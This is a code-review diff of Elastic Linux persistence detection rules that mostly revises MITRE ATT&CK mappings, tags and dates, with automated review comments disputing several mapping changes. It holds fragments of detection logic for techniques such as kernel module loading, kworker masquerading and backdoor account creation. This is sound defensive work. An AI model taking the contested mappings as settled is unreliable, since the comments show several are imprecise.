+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -118,6 +129,16 @@ id = "T1542"
 name = "Pre-OS Boot"
 reference = "https://attack.mitre.org/techniques/T1542/"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/linux/persistence_grub_makeconfig.toml b/rules/linux/persistence_grub_makeconfig.toml
index 7bdd557c7ce..dc757627521 100644
--- a/rules/linux/persistence_grub_makeconfig.toml
+++ b/rules/linux/persistence_grub_makeconfig.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
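Review bot: The tags hunk for grub_configuration_creation adds `Tactic: Execution` and `Tactic: Defense Evasion`, but the only threat change in this file section (`@@ -118,6 +129,16 @@`) adds T1543 and T1574 under the existing Persistence tactic; no Execution or Defense Evasion `[[rule.threat]]` entry appears before the section ends at `name = "Persistence"`. Unless those entries already exist outside the shown hunks, the two tags are orphaned and a tag/tactic consistency check will flag them. Either add the corresponding threat entries, as the dracut section on L2537 does, or drop the two tags.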
@@ -119,6 +119,16 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_init_d_file_creation.toml b/rules/linux/persistence_init_d_file_creation.toml index 1285bab4907..b4d7276cf08 100644 --- a/rules/linux/persistence_init_d_file_creation.toml +++ b/rules/linux/persistence_init_d_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -192,11 +192,6 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.004" -name = "RC Scripts" -reference = "https://attack.mitre.org/techniques/T1037/004/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_insmod_kernel_module_load.toml b/rules/linux/persistence_insmod_kernel_module_load.toml index 92ea71412a6..b0fd18bbca5 100644 --- a/rules/linux/persistence_insmod_kernel_module_load.toml +++ b/rules/linux/persistence_insmod_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/18" [transform] [[transform.osquery]] 
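Review bot: The first hunk adds T1543 Create or Modify System Process to the grub-mkconfig rule, which has the same fit problem as the sibling GRUB configuration rule: regenerating `grub.cfg` touches the bootloader, not a system service, so T1542 Pre-OS Boot (already present) with a nested `id = "T1542.003"` / `name = "Bootkit"` sub-technique is the precise mapping and T1543 is a stretch. The `[[rule.threat]]` table this hunk edits begins above the hunk, so I could not see whether other entries justify the broader mapping.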
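Review bot: Dropping `T1037.004` RC Scripts from persistence_init_d_file_creation.toml (the last hunk of this file) removes the one sub-technique that names exactly this artifact; the parent T1037 also covers Windows logon scripts and macOS login hooks, so the mapping becomes less precise than it was. Unless T1037.004 is deprecated in the ATT&CK version the repo validates against, keep the block `[[rule.threat.technique.subtechnique]]` / `id = "T1037.004"` / `name = "RC Scripts"` with its reference. The enclosing `[[rule.threat]]` table starts before this hunk.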
@@ -192,19 +192,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -219,3 +206,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kde_autostart_modification.toml b/rules/linux/persistence_kde_autostart_modification.toml index 9edc27b511d..58550c3b588 100644 --- a/rules/linux/persistence_kde_autostart_modification.toml +++ b/rules/linux/persistence_kde_autostart_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/06" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -243,11 +243,6 @@ id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.013" -name = "XDG Autostart Entries" -reference = "https://attack.mitre.org/techniques/T1547/013/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_kernel_driver_load.toml b/rules/linux/persistence_kernel_driver_load.toml index a705e1909cf..0f7b646be9e 100644 --- a/rules/linux/persistence_kernel_driver_load.toml 
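Review bot: The last hunk (persistence_kde_autostart_modification.toml) removes `T1547.013` XDG Autostart Entries, which is the sub-technique written for precisely the `.config/autostart` / `.desktop` artefacts a KDE autostart rule watches; leaving only the parent T1547 trades a precise mapping for a generic one and reduces ATT&CK Navigator coverage at the sub-technique level. Unless the sub-technique has been deprecated in the ATT&CK data the repo pins, keep `[[rule.threat.technique.subtechnique]]` / `id = "T1547.013"` / `name = "XDG Autostart Entries"` with its reference. The `[[rule.threat]]` table begins above the hunk, so I could not see the rest of the entry. The insmod reorder hunks earlier on this line are content-neutral.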
+++ b/rules/linux/persistence_kernel_driver_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -96,31 +96,31 @@ Kernel modules extend the functionality of the Linux kernel, allowing dynamic lo [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.006" name = "Kernel Modules and Extensions" reference = "https://attack.mitre.org/techniques/T1547/006/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/persistence_kernel_driver_load_by_non_root.toml b/rules/linux/persistence_kernel_driver_load_by_non_root.toml index 264a2ebba28..9f4a8303937 100644 --- a/rules/linux/persistence_kernel_driver_load_by_non_root.toml +++ b/rules/linux/persistence_kernel_driver_load_by_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/10" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
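Review bot: The reorder hunk in persistence_kernel_driver_load.toml leaves the blank-line layout inconsistent with every other rule in this series: the new side drops the blank line between `framework = "MITRE ATT&CK"` and `[[rule.threat.technique]]`, stacks two blank lines before each `[rule.threat.tactic]`, and adds a trailing blank line at end of file, whereas the sibling files use exactly one blank line between TOML tables. The mapping change itself is a pure reorder (Persistence first, then Rootkit under Defense Evasion), so this is only formatting, but it will churn again the next time the rule is normalised. I would run the repo's rule formatter (or hand-normalise to one blank line between tables, none at EOF) before merging.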
@@ -101,19 +101,6 @@ auditd.data.syscall in ("init_module", "finit_module") and user.id != "0" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -128,3 +115,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml index 474b8cef8fd..6a383383172 100644 --- a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml +++ b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/13" [rule] author = ["Elastic"] @@ -118,19 +118,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" 
@@ -145,3 +132,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kernel_object_file_creation.toml b/rules/linux/persistence_kernel_object_file_creation.toml index eed8a4ed3c7..e5b8aede59e 100644 --- a/rules/linux/persistence_kernel_object_file_creation.toml +++ b/rules/linux/persistence_kernel_object_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -79,7 +79,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -121,19 +129,15 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] diff --git a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml index 60a4a084698..59a33614ada 100644 --- a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml +++ b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -121,6 +121,16 @@ id = "T1543.005" name = "Container Service" reference = "https://attack.mitre.org/techniques/T1543/005/" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.007" +name = "Container Orchestration Job" +reference = "https://attack.mitre.org/techniques/T1053/007/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" 
diff --git a/rules/linux/persistence_kworker_file_creation.toml b/rules/linux/persistence_kworker_file_creation.toml index 5fb2a701f22..428a388aa15 100644 --- a/rules/linux/persistence_kworker_file_creation.toml +++ b/rules/linux/persistence_kworker_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -152,7 +152,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -172,14 +182,22 @@ process.name : "kworker*" and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.004" -name = "Masquerade Task or Service" -reference = "https://attack.mitre.org/techniques/T1036/004/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/persistence_linux_backdoor_user_creation.toml b/rules/linux/persistence_linux_backdoor_user_creation.toml index 42c38c10005..fde1a2aa627 100644 --- a/rules/linux/persistence_linux_backdoor_user_creation.toml +++ b/rules/linux/persistence_linux_backdoor_user_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] 
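Review bot: The threat hunk for persistence_kworker_file_creation.toml removes T1036 / `T1036.004` Masquerade Task or Service, which is the technique that literally describes what the rule detects — a process named `kworker*` (per the hunk header) that is not a kernel thread writing files — and replaces it with T1547 Boot or Logon Autostart Execution, which has no relationship to a file write by a masquerading process. The new Defense Evasion entry keeps only T1014 Rootkit, so the masquerading angle is now unmapped; I would retain `[[rule.threat.technique]]` / `id = "T1036"` / `name = "Masquerading"` with the `T1036.004` sub-technique in the Defense Evasion entry alongside T1014, and drop or justify T1547. The query that precedes the hunk is outside this chunk, so I am going by the `process.name : "kworker*"` context line.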
@@ -122,7 +122,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -136,24 +147,16 @@ process.args in ("-o", "--non-unique") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[[rule.threat.technique.subtechnique]] +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_linux_group_creation.toml b/rules/linux/persistence_linux_group_creation.toml index f7dfdc918b0..1a5ec523679 100644 
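Review bot: The threat hunk for persistence_linux_backdoor_user_creation.toml replaces T1098 Account Manipulation with `T1136.001` Local Account and deletes the Privilege Escalation entry, but the only query fragment visible (`process.args in ("-o", "--non-unique")`) is the non-unique-UID flag accepted by both `useradd` and `usermod`; if the query also matches `usermod`, the detection covers modifying an existing account to a duplicate UID 0, which is T1098, not account creation. I would keep T1098 next to T1136.001 unless the query is useradd-only, and note that ATT&CK places T1098 under both Persistence and Privilege Escalation, so dropping it is also what removes the `Tactic: Privilege Escalation` coverage for a UID-0 backdoor. The query starts above this hunk, so I could not confirm which binaries it matches.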
--- a/rules/linux/persistence_linux_group_creation.toml +++ b/rules/linux/persistence_linux_group_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -103,7 +103,13 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -114,34 +120,16 @@ iam where host.os.type == "linux" and event.type == "group" and event.type == "c framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" [[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_linux_shell_activity_via_web_server.toml b/rules/linux/persistence_linux_shell_activity_via_web_server.toml index a496f455970..e3267bc31b1 100644 --- a/rules/linux/persistence_linux_shell_activity_via_web_server.toml +++ b/rules/linux/persistence_linux_shell_activity_via_web_server.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] 
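Review bot: The persistence_linux_group_creation.toml hunk maps a group-creation event (`event.type == "group" and event.type == "creation"` in the hunk header) to `T1136.001` Local Account, which describes creating a user account, and removes `T1098.007` Additional Local or Domain Groups, the sub-technique written for exactly this group activity. This is a precision regression rather than a tidy-up; I would restore `[[rule.threat.technique]]` / `id = "T1098"` / `name = "Account Manipulation"` with the T1098.007 sub-technique and drop T1136.001, keeping a single Persistence entry as the hunk intends. If the goal was only to remove the duplicated Privilege Escalation block, that part of the change is fine on its own.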
@@ -179,19 +179,6 @@ process where host.os.type == "linux" and event.type == "start" and process.pare [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" @@ -206,3 +193,16 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/persistence_linux_user_added_to_privileged_group.toml b/rules/linux/persistence_linux_user_added_to_privileged_group.toml index 001f3e1a015..10ff2785c87 100644 --- a/rules/linux/persistence_linux_user_added_to_privileged_group.toml +++ b/rules/linux/persistence_linux_user_added_to_privileged_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] 
@@ -114,7 +114,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -133,34 +144,16 @@ process.executable != null and process.args in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" [[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_lkm_configuration_file_creation.toml b/rules/linux/persistence_lkm_configuration_file_creation.toml index f939a674b6d..4bf0c7baf4b 100644 --- a/rules/linux/persistence_lkm_configuration_file_creation.toml +++ b/rules/linux/persistence_lkm_configuration_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
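Review bot: The persistence_linux_user_added_to_privileged_group.toml hunk replaces `T1098.007` Additional Local or Domain Groups with `T1136.001` Local Account and drops the Privilege Escalation entry, but adding an existing user to a privileged group (the rule's name and the `process.args in (` context) is group manipulation, not account creation, and is the canonical privilege-escalation use of T1098. I would keep `id = "T1098"` with the `T1098.007` sub-technique under Persistence and, since ATT&CK lists T1098 under Privilege Escalation as well, retain the `Tactic: Privilege Escalation` tag that the earlier tags hunk removes. The query begins above the hunk, so I could not verify the exact group list.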
@@ -54,7 +54,15 @@ Loadable Kernel Modules (LKMs) are components that can be dynamically loaded int risk_score = 47 rule_id = "6e2355cc-c60a-4d92-a80c-e54a45ad2400" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -113,3 +121,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_manual_dracut_execution.toml b/rules/linux/persistence_manual_dracut_execution.toml index 71052803c71..0afee6bda3f 100644 --- a/rules/linux/persistence_manual_dracut_execution.toml +++ b/rules/linux/persistence_manual_dracut_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
@@ -82,7 +82,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -114,3 +125,21 @@ reference = "https://attack.mitre.org/techniques/T1542/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_message_of_the_day_creation.toml b/rules/linux/persistence_message_of_the_day_creation.toml index 5caeea7b41d..32d08cc31f9 100644 --- a/rules/linux/persistence_message_of_the_day_creation.toml +++ b/rules/linux/persistence_message_of_the_day_creation.toml @@ 